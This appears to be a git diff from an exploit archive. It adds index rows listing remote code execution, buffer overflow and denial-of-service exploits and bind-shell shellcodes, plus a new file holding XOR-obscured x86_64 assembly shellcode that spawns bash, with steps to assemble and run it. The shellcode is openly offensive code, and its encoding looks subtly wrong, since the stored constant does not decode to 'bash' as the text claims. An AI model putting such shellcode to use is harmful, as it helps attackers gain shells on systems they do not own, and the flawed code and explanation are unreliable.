41980,exploits/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,"Mehmet Ince",remote,python,80,2017-05-09,2017-06-26,1,,Remote,,,,https://github.com/rapid7/metasploit-framework/blob/05bf16e91ec22d94695da5ed643b5cd96f7f4924/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb
@ -38724,6 +38751,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
780,exploits/windows/dos/780.c,"Xpand Rally 1.0.0.0 (Server/Clients) - Crash",2005-01-31,"Luigi Auriemma",dos,windows,28015,2005-01-30,,1,OSVDB-13317;CVE-2005-0325,,,,,
37299,exploits/windows/dos/37299.py,"XtMediaPlayer 0.93 - '.wav' Crash (PoC)",2015-06-16,"SATHISH ARTHAR",dos,windows,,2015-06-16,2015-06-16,1,OSVDB-123359,,,,http://www.exploit-db.comXtMediaPlayer_0.93_Win.rar,
11176,exploits/windows/dos/11176.txt,"Xunlei XPPlayer 5.9.14.1246 - ActiveX Remote Execution (PoC)",2010-01-17,superli,dos,windows,,2010-01-16,,1,OSVDB-64386,,Xunlei_XPPlayer_ActiveX_Remote_Exec_0day_POC.zip,,http://www.exploit-db.comThunder5.9.14.1246.exe,
51265,exploits/windows/dos/51265.txt,"XWorm Trojan 2.1 - Null Pointer Derefernce DoS",2023-04-05,"TOUHAMI Kasbaoui",dos,windows,,2023-04-05,2023-04-05,0,,,,,,
15905,exploits/windows/dos/15905.py,"Xynph FTP Server 1.0 - USER Denial of Service",2011-01-04,freak_out,dos,windows,,2011-01-05,2016-09-27,1,,,,http://www.exploit-db.com/screenshots/idlt16000/15905.png,http://www.exploit-db.comxynph10.zip,
941,exploits/windows/dos/941.c,"Yager 5.24 - Multiple Denial of Service Vulnerabilities",2005-04-14,"Luigi Auriemma",dos,windows,,2005-04-13,,1,OSVDB-15509;CVE-2005-1165;CVE-2005-1164,,,,,
6072,exploits/windows/dos/6072.html,"Yahoo Messenger 8.1 - ActiveX Remote Denial of Service",2008-07-14,"Jeremy Brown",dos,windows,,2008-07-13,,1,,,,,,
@ -42854,6 +42882,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
16568,exploits/windows/remote/16568.rb,"Juniper SSL-VPN IVE - 'JuniperSetupDLL.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2006-2086;OSVDB-25001,"Metasploit Framework (MSF)",,,,
17460,exploits/windows/remote/17460.pl,"Kaillera - Multiple Clients Buffer Overflow Vulnerabilities",2011-06-30,Sil3nt_Dre4m,remote,windows,,2011-06-30,2011-06-30,0,,,,,http://www.exploit-db.comProject64k_0_13.zip,
28186,exploits/windows/remote/28186.c,"Kaillera 0.86 - Message Buffer Overflow",2006-07-06,"Luigi Auriemma",remote,windows,,2006-07-06,2013-09-10,1,CVE-2006-3491;OSVDB-27041,,,,,https://www.securityfocus.com/bid/18871/info
51239,exploits/windows/remote/51239.py,"Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution)",2023-04-05,"Patrick Hener",remote,windows,,2023-04-05,2023-04-05,0,CVE-2023-22855,,,,,
1462,exploits/windows/remote/1462.cpp,"KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp)",2006-01-31,HolyGhost,remote,windows,21,2006-01-30,2016-10-27,1,CVE-2006-0441;OSVDB-22734,,,,,
1452,exploits/windows/remote/1452.pm,"KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (Metasploit)",2006-01-25,redsand,remote,windows,21,2006-01-24,2016-10-27,1,CVE-2006-0441;OSVDB-22734,"Metasploit Framework (MSF)",,,,
1448,exploits/windows/remote/1448.pl,"KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Buffer Overflow",2006-01-25,"Critical Security",remote,windows,,2006-01-24,2016-10-27,1,OSVDB-22734;CVE-2006-0441,,,,,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -819,6 +819,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",,linux_x86-64,31,2017-03-03,2017-08-24,0,,,,,,
13320,shellcodes/linux_x86-64/13320.c,"Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,,linux_x86-64,49,2009-05-13,2017-07-04,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-77.php
47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (168 bytes)",2019-07-29,"Pedro Cabral",,linux_x86-64,168,2019-07-29,2019-08-01,0,,,,,,
51258,shellcodes/linux_x86-64/51258.txt,"Linux/x86_64 - bash Shellcode with xor encoding",2023-04-05,"Jeenika Anadani",,linux_x86-64,71,2023-04-05,2023-04-05,0,,,,,,
47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",,linux_x86-64,129,2019-08-19,2019-08-20,0,,,,,,
46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",,linux_x86-64,104,2019-06-10,2019-06-10,0,,,,,,
46975,shellcodes/linux_x86-64/46975.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2019-06-07,"Aron Mihaljevic",,linux_x86-64,131,2019-06-07,2019-06-07,0,,,,,,

1 id file description date_published author type platform size date_added date_updated verified codes tags aliases screenshot_url application_url source_url
819 41498 shellcodes/linux_x86-64/41498.nasm Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes) 2017-03-03 Robert L. Taylor linux_x86-64 31 2017-03-03 2017-08-24 0
820 13320 shellcodes/linux_x86-64/13320.c Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes) 2009-05-14 evil.xi4oyu linux_x86-64 49 2009-05-13 2017-07-04 1 http://shell-storm.org/shellcode/files/shellcode-77.php
821 47183 shellcodes/linux_x86-64/47183.c Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (168 bytes) 2019-07-29 Pedro Cabral linux_x86-64 168 2019-07-29 2019-08-01 0
822 51258 shellcodes/linux_x86-64/51258.txt Linux/x86_64 - bash Shellcode with xor encoding 2023-04-05 Jeenika Anadani linux_x86-64 71 2023-04-05 2023-04-05 0
823 47290 shellcodes/linux_x86-64/47290.c Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (129 bytes) 2019-08-19 Gonçalo Ribeiro linux_x86-64 129 2019-08-19 2019-08-20 0
824 46979 shellcodes/linux_x86-64/46979.c Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes) 2019-06-10 Aron Mihaljevic linux_x86-64 104 2019-06-10 2019-06-10 0
825 46975 shellcodes/linux_x86-64/46975.c Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes) 2019-06-07 Aron Mihaljevic linux_x86-64 131 2019-06-07 2019-06-07 0

68
shellcodes/linux_x86-64/51258.txt Normal file
View file

@ -0,0 +1,68 @@
Exploit Title: Linux/x86_64 - bash shellcode with xor encoding
Date: 05/02/2023
Exploit Author: Jeenika Anadani
Contact: https://twitter.com/cyber_jeeni
Category: Shellcode
Architectue: Linux x86_64
Shellcode Length: 71 Bytes
-----------------------
section .data
section .text
global _start
_start:
; set up argv and envp arrays for execve()
xor rax, rax
mov [rsp-8], rax
mov qword [rsp-16], 0x72613162 ; encrypted 'bash'
xor byte [rsp-16], 0x08
xor byte [rsp-15], 0x16
xor byte [rsp-14], 0x24
xor byte [rsp-13], 0x32
lea rdx, [rsp-16]
mov qword [rsp-24], rdx
mov qword [rsp-32], rdx
lea rdi, [rsp-32]
; call execve()
xor eax, eax
mov al, 59
syscall
; exit with status code 0
xor eax, eax
mov ebx, eax
mov al, 60
syscall
-----------
#### Explanation:
This code uses XOR encryption to obscure the name of the program being executed, `"bash"`. The XOR encryption key is `0x08162432`, which is applied to each byte of the string. The decryption is performed just before calling `execve`, so the program name is passed in its original form.
The rest of the code is the same as the previous example, making a system call to the `execve` function and then calling the `exit` syscall to terminate the process.
---------
### Compilation AND Execution:
To run the x86_64 assembly code on a Linux system, you need to assemble it into an executable file and then run the file. Here are the steps:
1. Save the code to a file with a `.asm` extension, for example `bash.asm`.
2. Assemble the code into an object file using an assembler, such as NASM:
`nasm -f elf64 -o bash.o bash.asm`
The `-f elf64` option specifies that the output format should be ELF64 (Executable and Linkable Format), and the `-o` option specifies the name of the output file, `bash.o`.
3. Link the object file to produce an executable file using the `ld` linker:
`ld -s -o bash bash.o`
The `-s` option removes the symbol table from the output file to make it smaller, and the `-o` option specifies the name of the output file, `bash`.
4. Make the file executable:
`chmod +x bash`
5. Finally, you can run the file:
`./bash`
---------------------